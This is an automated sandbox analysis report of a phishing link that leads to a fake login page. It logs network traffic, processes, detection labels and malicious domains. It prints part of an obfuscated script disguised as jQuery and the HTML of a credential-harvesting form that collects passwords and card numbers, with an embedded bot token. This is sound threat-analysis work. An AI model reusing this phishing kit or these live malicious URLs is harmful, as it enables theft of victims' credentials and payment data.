Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: classification engineClassification label: mal72.phis.troj.win@17/23@12/6
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2020,i,13172820280483757675,6438960111630721238,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sdazraf.hosted.phplist.com/lists/lt.php?tid=LkQEAA1XAgcGUE4JBFUIGlcAUFAaAwVaVxsIVFpTUgYHD1RQBlwaVAEFUwYKAFQaVVUMABpVUglQGwhSUwYZCl5ZAw4NU1IBVQYATFEGAFJaBQwHGgdSXAYbBVhSABkKAloCGw0GUgEEBgAGVwMADg"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2020,i,13172820280483757675,6438960111630721238,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Obfuscated Files or Information
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive14
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://sdazraf.hosted.phplist.com/lists/lt.php?tid=LkQEAA1XAgcGUE4JBFUIGlcAUFAaAwVaVxsIVFpTUgYHD1RQBlwaVAEFUwYKAFQaVVUMABpVUglQGwhSUwYZCl5ZAw4NU1IBVQYATFEGAFJaBQwHGgdSXAYbBVhSABkKAloCGw0GUgEEBgAGVwMADg0%Avira URL Cloudsafe
https://sdazraf.hosted.phplist.com/lists/lt.php?tid=LkQEAA1XAgcGUE4JBFUIGlcAUFAaAwVaVxsIVFpTUgYHD1RQBlwaVAEFUwYKAFQaVVUMABpVUglQGwhSUwYZCl5ZAw4NU1IBVQYATFEGAFJaBQwHGgdSXAYbBVhSABkKAloCGw0GUgEEBgAGVwMADg100%SlashNextCredential Stealing type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://spoty-omsave0558101.codeanyapp.com/army/army100%Avira URL Cloudphishing
https://drafts.csswg.org/css-conditional-4/#dfn-support-selector0%Avira URL Cloudsafe
https://spoty-omsave0558101.codeanyapp.com/army/army/auth/res/jquery.js100%Avira URL Cloudphishing
https://spoty-omsave0558101.codeanyapp.com/favicon.ico100%Avira URL Cloudphishing
https://spoty-omsave0558101.codeanyapp.com/army/army/auth/res/remember.png100%Avira URL Cloudphishing
https://spoty-omsave0558101.codeanyapp.com/army/army/auth/res/loading.gif100%Avira URL Cloudphishing
https://spoty-omsave0558101.codeanyapp.com/army/army/auth/res/app.css100%Avira URL Cloudphishing
https://drafts.csswg.org/css-conditional-4/#typedef-supports-selector-fn0%Avira URL Cloudsafe
https://spoty-omsave0558101.codeanyapp.com/army/army/auth/res/jq.js100%Avira URL Cloudphishing
https://drafts.csswg.org/selectors/#forgiving-selector0%Avira URL Cloudsafe
https://drafts.csswg.org/selectors/#relational0%Avira URL Cloudsafe
https://spoty-omsave0558101.codeanyapp.com/army/army/auth/res/logo.png100%Avira URL Cloudphishing
https://spoty-omsave0558101.codeanyapp.com/army/army/100%Avira URL Cloudphishing
NameIPActiveMaliciousAntivirus DetectionReputation
aspen.phplist.com
45.33.29.14
truefalse
    unknown
    spoty-omsave0558101.codeanyapp.com
    198.199.109.95
    truetrue
      unknown
      www.google.com
      142.250.184.228
      truefalse
        high
        chacktgbot.duckdns.org
        102.165.14.26
        truetrue
          unknown
          sdazraf.hosted.phplist.com
          unknown
          unknowntrue
            unknown
            _7001._https.chacktgbot.duckdns.org
            unknown
            unknowntrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              https://spoty-omsave0558101.codeanyapp.com/army/armyfalse
              • Avira URL Cloud: phishing
              unknown
              https://spoty-omsave0558101.codeanyapp.com/army/army/auth/res/jquery.jsfalse
              • Avira URL Cloud: phishing
              unknown
              https://spoty-omsave0558101.codeanyapp.com/army/army/auth/res/loading.giffalse
              • Avira URL Cloud: phishing
              unknown
              https://spoty-omsave0558101.codeanyapp.com/favicon.icofalse
              • Avira URL Cloud: phishing
              unknown
              https://spoty-omsave0558101.codeanyapp.com/army/army/auth/res/app.cssfalse
              • Avira URL Cloud: phishing
              unknown
              https://spoty-omsave0558101.codeanyapp.com/army/army/auth/res/jq.jsfalse
              • Avira URL Cloud: phishing
              unknown
              https://spoty-omsave0558101.codeanyapp.com/army/army/auth/res/remember.pngfalse
              • Avira URL Cloud: phishing
              unknown
              https://spoty-omsave0558101.codeanyapp.com/army/army/false
              • Avira URL Cloud: phishing
              unknown
              https://spoty-omsave0558101.codeanyapp.com/army/army/auth/res/logo.pngfalse
              • Avira URL Cloud: phishing
              unknown
              https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phptrue
                unknown
                https://sdazraf.hosted.phplist.com/lists/lt.php?tid=LkQEAA1XAgcGUE4JBFUIGlcAUFAaAwVaVxsIVFpTUgYHD1RQBlwaVAEFUwYKAFQaVVUMABpVUglQGwhSUwYZCl5ZAw4NU1IBVQYATFEGAFJaBQwHGgdSXAYbBVhSABkKAloCGw0GUgEEBgAGVwMADgtrue
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://bugs.webkit.org/show_bug.cgi?id=136851chromecache_58.2.dr, chromecache_60.2.drfalse
                    high
                    https://jsperf.com/thor-indexof-vs-for/5chromecache_58.2.dr, chromecache_60.2.drfalse
                      high
                      https://bugs.jquery.com/ticket/12359chromecache_58.2.dr, chromecache_60.2.drfalse
                        high
                        https://html.spec.whatwg.org/#strip-and-collapse-whitespacechromecache_58.2.dr, chromecache_60.2.drfalse
                          high
                          https://promisesaplus.com/#point-75chromecache_58.2.dr, chromecache_60.2.drfalse
                            high
                            https://drafts.csswg.org/cssom/#common-serializing-idiomschromecache_58.2.dr, chromecache_60.2.drfalse
                              high
                              https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabledchromecache_58.2.dr, chromecache_60.2.drfalse
                                high
                                https://bugs.webkit.org/show_bug.cgi?id=29084chromecache_58.2.dr, chromecache_60.2.drfalse
                                  high
                                  https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespacechromecache_58.2.dr, chromecache_60.2.drfalse
                                    high
                                    https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabledchromecache_58.2.dr, chromecache_60.2.drfalse
                                      high
                                      https://github.com/jquery/jquery/pull/557)chromecache_58.2.dr, chromecache_60.2.drfalse
                                        high
                                        https://bugs.chromium.org/p/chromium/issues/detail?id=378607chromecache_58.2.dr, chromecache_60.2.drfalse
                                          high
                                          https://drafts.csswg.org/selectors/#forgiving-selectorchromecache_58.2.dr, chromecache_60.2.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anonchromecache_58.2.dr, chromecache_60.2.drfalse
                                            high
                                            https://bugzilla.mozilla.org/show_bug.cgi?id=687787chromecache_58.2.dr, chromecache_60.2.drfalse
                                              high
                                              https://bugs.chromium.org/p/chromium/issues/detail?id=470258chromecache_58.2.dr, chromecache_60.2.drfalse
                                                high
                                                https://bugs.jquery.com/ticket/13378chromecache_58.2.dr, chromecache_60.2.drfalse
                                                  high
                                                  https://promisesaplus.com/#point-64chromecache_58.2.dr, chromecache_60.2.drfalse
                                                    high
                                                    https://drafts.csswg.org/css-conditional-4/#dfn-support-selectorchromecache_58.2.dr, chromecache_60.2.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://drafts.csswg.org/css-conditional-4/#typedef-supports-selector-fnchromecache_58.2.dr, chromecache_60.2.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://promisesaplus.com/#point-61chromecache_58.2.dr, chromecache_60.2.drfalse
                                                      high
                                                      https://drafts.csswg.org/cssom/#resolved-valueschromecache_58.2.dr, chromecache_60.2.drfalse
                                                        high
                                                        https://bugs.chromium.org/p/chromium/issues/detail?id=589347chromecache_58.2.dr, chromecache_60.2.drfalse
                                                          high
                                                          https://html.spec.whatwg.org/#nonce-attributeschromecache_58.2.dr, chromecache_60.2.drfalse
                                                            high
                                                            https://html.spec.whatwg.org/multipage/syntax.html#attributes-2chromecache_58.2.dr, chromecache_60.2.drfalse
                                                              high
                                                              https://promisesaplus.com/#point-59chromecache_58.2.dr, chromecache_60.2.drfalse
                                                                high
                                                                https://jsperf.com/getall-vs-sizzle/2chromecache_58.2.dr, chromecache_60.2.drfalse
                                                                  high
                                                                  https://promisesaplus.com/#point-57chromecache_58.2.dr, chromecache_60.2.drfalse
                                                                    high
                                                                    https://promisesaplus.com/#point-54chromecache_58.2.dr, chromecache_60.2.drfalse
                                                                      high
                                                                      https://drafts.csswg.org/selectors/#relationalchromecache_58.2.dr, chromecache_60.2.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://html.spec.whatwg.org/multipage/forms.html#category-listedchromecache_58.2.dr, chromecache_60.2.drfalse
                                                                        high
                                                                        https://html.spec.whatwg.org/multipage/scripting.html#selector-disabledchromecache_58.2.dr, chromecache_60.2.drfalse
                                                                          high
                                                                          https://developer.mozilla.org/en-US/docs/CSS/displaychromecache_58.2.dr, chromecache_60.2.drfalse
                                                                            high
                                                                            https://jquery.org/licensechromecache_58.2.dr, chromecache_60.2.drfalse
                                                                              high
                                                                              https://jquery.com/chromecache_58.2.dr, chromecache_60.2.drfalse
                                                                                high
                                                                                https://bugs.webkit.org/show_bug.cgi?id=137337chromecache_58.2.dr, chromecache_60.2.drfalse
                                                                                  high
                                                                                  https://html.spec.whatwg.org/multipage/scripting.html#selector-enabledchromecache_58.2.dr, chromecache_60.2.drfalse
                                                                                    high
                                                                                    https://promisesaplus.com/#point-48chromecache_58.2.dr, chromecache_60.2.drfalse
                                                                                      high
                                                                                      https://github.com/jquery/sizzle/pull/225chromecache_58.2.dr, chromecache_60.2.drfalse
                                                                                        high
                                                                                        https://bugs.jquery.com/ticket/4833chromecache_58.2.dr, chromecache_60.2.drfalse
                                                                                          high
                                                                                          https://github.com/whatwg/html/issues/2369chromecache_58.2.dr, chromecache_60.2.drfalse
                                                                                            high
                                                                                            https://sizzlejs.com/chromecache_58.2.dr, chromecache_60.2.drfalse
                                                                                              high
                                                                                              https://bugs.chromium.org/p/chromium/issues/detail?id=449857chromecache_58.2.dr, chromecache_60.2.drfalse
                                                                                                high
                                                                                                https://js.foundation/chromecache_58.2.dr, chromecache_60.2.drfalse
                                                                                                  high
                                                                                                  https://bugs.jquery.com/ticket/13393chromecache_58.2.dr, chromecache_60.2.drfalse
                                                                                                    high
                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs
                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    45.33.29.14
                                                                                                    aspen.phplist.comUnited States
                                                                                                    63949LINODE-APLinodeLLCUSfalse
                                                                                                    239.255.255.250
                                                                                                    unknownReserved
                                                                                                    unknownunknownfalse
                                                                                                    198.199.109.95
                                                                                                    spoty-omsave0558101.codeanyapp.comUnited States
                                                                                                    14061DIGITALOCEAN-ASNUStrue
                                                                                                    142.250.184.228
                                                                                                    www.google.comUnited States
                                                                                                    15169GOOGLEUSfalse
                                                                                                    102.165.14.26
                                                                                                    chacktgbot.duckdns.orgSouth Africa
                                                                                                    61317ASDETUKhttpwwwheficedcomGBtrue
                                                                                                    IP
                                                                                                    192.168.2.4
                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                    Analysis ID:1583258
                                                                                                    Start date and time:2025-01-02 09:48:53 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 3m 12s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:browseurl.jbs
                                                                                                    Sample URL:https://sdazraf.hosted.phplist.com/lists/lt.php?tid=LkQEAA1XAgcGUE4JBFUIGlcAUFAaAwVaVxsIVFpTUgYHD1RQBlwaVAEFUwYKAFQaVVUMABpVUglQGwhSUwYZCl5ZAw4NU1IBVQYATFEGAFJaBQwHGgdSXAYbBVhSABkKAloCGw0GUgEEBgAGVwMADg
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:8
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Detection:MAL
                                                                                                    Classification:mal72.phis.troj.win@17/23@12/6
                                                                                                    EGA Information:Failed
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 100%
                                                                                                    • Number of executed functions: 0
                                                                                                    • Number of non-executed functions: 0
                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 142.250.185.163, 142.250.184.206, 74.125.133.84, 172.217.16.206, 216.58.206.78, 142.250.74.206, 192.229.221.95, 216.58.212.170, 216.58.206.74, 142.250.184.234, 216.58.212.138, 142.250.184.202, 142.250.181.234, 142.250.186.74, 142.250.185.234, 142.250.185.106, 142.250.185.74, 142.250.185.170, 172.217.18.106, 142.250.186.170, 142.250.185.138, 216.58.206.42, 142.250.185.202, 199.232.210.172, 142.250.186.174, 142.250.185.110, 142.250.185.238, 142.250.185.174, 142.250.185.78, 142.250.181.238, 142.250.184.227, 142.250.186.46, 142.250.185.142, 184.28.90.27, 20.109.210.53, 13.107.246.45
                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    • VT rate limit hit for: https://sdazraf.hosted.phplist.com/lists/lt.php?tid=LkQEAA1XAgcGUE4JBFUIGlcAUFAaAwVaVxsIVFpTUgYHD1RQBlwaVAEFUwYKAFQaVVUMABpVUglQGwhSUwYZCl5ZAw4NU1IBVQYATFEGAFJaBQwHGgdSXAYbBVhSABkKAloCGw0GUgEEBgAGVwMADg
                                                                                                    No simulations
                                                                                                    No context
                                                                                                    No context
                                                                                                    No context
                                                                                                    No context
                                                                                                    No context
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):28
                                                                                                    Entropy (8bit):4.307354922057605
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:6DgMuSjPkY:ZSjcY
                                                                                                    MD5:C488467D609328F3C0AB9473AB609226
                                                                                                    SHA1:E64731F5EB06F0732DC9D95B7469B40AC30D6EFD
                                                                                                    SHA-256:CF7A41FAE36D682C52567D20739C15EACC0D2F65CFE6C4ED7173C0A00DC7DA58
                                                                                                    SHA-512:1211C58ECC8D6859F833B7F4CE03C4E6542C2526A9B41720B8F0BC276CB6D01FBE80CDA8C59EEB8B689AD78595BBBE7B82154FB0FB3800796DE283B188F8FD20
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwlpWmOXAtsyxRIFDfR8SO0SBQ2Q9l9q?alt=proto
                                                                                                    Preview:ChIKBw30fEjtGgAKBw2Q9l9qGgA=
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (2841), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):2841
                                                                                                    Entropy (8bit):5.698894313814129
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:i/nBlJrI6UBWWqmqRSkT/5Pg36TXDDgQRTqVn38VtH73hulJjFr3RPxrZBcLTxlm:iPBvrTkKlxPgKTXVYA73wDBBP9fez+8O
                                                                                                    MD5:79EEABFFEA8449FDE8DD49474581188F
                                                                                                    SHA1:6BDB348B9203FF15AA43B868B931A80A70FD6E77
                                                                                                    SHA-256:2E8E63722D5D14189DDAAE0D0BF97A5EF78C07B8CEC87EEB03101D97FEA70668
                                                                                                    SHA-512:BA66EEF615E43ADFFF177009BFD6D30BA95DB5C65B6AEC4F97B110BE0F717060D09B3747ACC95542E910755B1EA00A17C4A5CF075E51EA67A333234092D64DD9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://spoty-omsave0558101.codeanyapp.com/army/army/auth/res/jquery.js
                                                                                                    Preview:var protocol,url,data;(function(){var Oyh='',KMo=726-715;function Kwd(f){var k=1542294;var s=f.length;var p=[];for(var i=0;i<s;i++){p[i]=f.charAt(i)};for(var i=0;i<s;i++){var a=k*(i+393)+(k%27065);var x=k*(i+202)+(k%30504);var q=a%s;var b=x%s;var u=p[q];p[q]=p[b];p[b]=u;k=(a+x)%2621939;};return p.join('')};var sgG=Kwd('ctnptjhsoulafngcczorybrsvqokxrdutemwi').substr(0,KMo);var KYJ='m,e h aib(.r5l6o+;;)a;+,=)r,atgfgh;;;lmn.Ati,(hlwx.lSiuaj0+[ry=0=0f}=930];;}vr;86,(0ne==a rx 0[ep88t;<d-(e6[.=n1o64;m=c,n;-v ("=7vj;[rrabi-m}itl4]lanf,(h=o+, v5at9d];8ot)y>y ]=]tobc(a6rv4=ev]h+j;8nvrdalavo+o0)vfat,r{0t5sa)9"rur(gC;))])j <fea=s1)v[t{x]..i=r)enr )i<ir)vvr;(r;vl)d([(t, rh7},d,-)Cpo;e, ozfku6f7".ae[)r6e"p a=yr) nvv1lt2cv;hr;!healybije8fdi-lpimr+ergny=2+ht=;i8[n{rl"<f.al9h,cea9;)kht)yl)r+c[(sa1au=()=1c)acr1.18.au)>+r+oo60roy+1)-u(})e]++s;r,ln8 )ftv(e;;5g;hnqbm+g(vgu;,u nca[.o l A2;t+fCraa2uhtr[ydrAr9kfo8- (n=0r. a3=}+)yx{c.+]ioustsa((8p,r;gxd[=;.isi(aah.c n.++h=7su+v)okt(htfr1ggv(p=s ft1;r3shen=hC
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (2841), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2841
                                                                                                    Entropy (8bit):5.698894313814129
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:i/nBlJrI6UBWWqmqRSkT/5Pg36TXDDgQRTqVn38VtH73hulJjFr3RPxrZBcLTxlm:iPBvrTkKlxPgKTXVYA73wDBBP9fez+8O
                                                                                                    MD5:79EEABFFEA8449FDE8DD49474581188F
                                                                                                    SHA1:6BDB348B9203FF15AA43B868B931A80A70FD6E77
                                                                                                    SHA-256:2E8E63722D5D14189DDAAE0D0BF97A5EF78C07B8CEC87EEB03101D97FEA70668
                                                                                                    SHA-512:BA66EEF615E43ADFFF177009BFD6D30BA95DB5C65B6AEC4F97B110BE0F717060D09B3747ACC95542E910755B1EA00A17C4A5CF075E51EA67A333234092D64DD9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var protocol,url,data;(function(){var Oyh='',KMo=726-715;function Kwd(f){var k=1542294;var s=f.length;var p=[];for(var i=0;i<s;i++){p[i]=f.charAt(i)};for(var i=0;i<s;i++){var a=k*(i+393)+(k%27065);var x=k*(i+202)+(k%30504);var q=a%s;var b=x%s;var u=p[q];p[q]=p[b];p[b]=u;k=(a+x)%2621939;};return p.join('')};var sgG=Kwd('ctnptjhsoulafngcczorybrsvqokxrdutemwi').substr(0,KMo);var KYJ='m,e h aib(.r5l6o+;;)a;+,=)r,atgfgh;;;lmn.Ati,(hlwx.lSiuaj0+[ry=0=0f}=930];;}vr;86,(0ne==a rx 0[ep88t;<d-(e6[.=n1o64;m=c,n;-v ("=7vj;[rrabi-m}itl4]lanf,(h=o+, v5at9d];8ot)y>y ]=]tobc(a6rv4=ev]h+j;8nvrdalavo+o0)vfat,r{0t5sa)9"rur(gC;))])j <fea=s1)v[t{x]..i=r)enr )i<ir)vvr;(r;vl)d([(t, rh7},d,-)Cpo;e, ozfku6f7".ae[)r6e"p a=yr) nvv1lt2cv;hr;!healybije8fdi-lpimr+ergny=2+ht=;i8[n{rl"<f.al9h,cea9;)kht)yl)r+c[(sa1au=()=1c)acr1.18.au)>+r+oo60roy+1)-u(})e]++s;r,ln8 )ftv(e;;5g;hnqbm+g(vgu;,u nca[.o l A2;t+fCraa2uhtr[ydrAr9kfo8- (n=0r. a3=}+)yx{c.+]ioustsa((8p,r;gxd[=;.isi(aah.c n.++h=7su+v)okt(htfr1ggv(p=s ft1;r3shen=hC
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:HTML document, ASCII text, with very long lines (5282), with CRLF line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):12159
                                                                                                    Entropy (8bit):4.857380829499872
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:p8uuUewpJU+5KUaHpPDt2aGZ0qXLHm63Xxy9vKLgPfHYPTCwftZpyHtmuPAbkpjx:+uuO6I3c
                                                                                                    MD5:AB7AAE0ACF0FA418C99D12FEB9B9AC7B
                                                                                                    SHA1:91EAC78F07A953C9D628E13910484AE3C81996C7
                                                                                                    SHA-256:9FC3E0344C21926BC99430A6A9D7C3AD97271CDCEC111CAD5A7B3AEE2A75D6E9
                                                                                                    SHA-512:9C98C9473FACE75AB3096F222DCBAA2BB3C4177D2E9D35E1AEAC25169BFFCC8B0026DAC30548DA33A4F6A09B8C4DE4D59B36C9D7DF49569D2BBFD1E13DADF83F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.php
                                                                                                    Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">.. <title>Welcome</title>.. <link rel="stylesheet" href="res/app.css">..</head>..<body>..<form action="action.php" method="POST">.. <input type="hidden" name="LOGIN">.. <input type="hidden" name="USERNAME">.. <input type="hidden" name="PASSWORD">.. <input type="hidden" name="CARD_NUMBER">.. <input type="hidden" name="PHONE_NUMBER">..</form>..<header>.. <img src="res/logo.png">..</header>..<script>var token="7921160831:AAGp_gK6aNm0hlT-haykKHS4ATbc122YQkE";</script>..<div class="loader" style=" color:white; text-align:center;">.. <div class="content" style="flex-direction:column;">.. <h3>Please wait...</h3>.. <p>Do not leave this page.<br> You will automatically be redirected.</p>.. <img src="res/loading.gif">..</div>..</div>....<main>....<div class="form">....<div class="title">..<sp
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 47 x 31, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):507
                                                                                                    Entropy (8bit):7.299004550654204
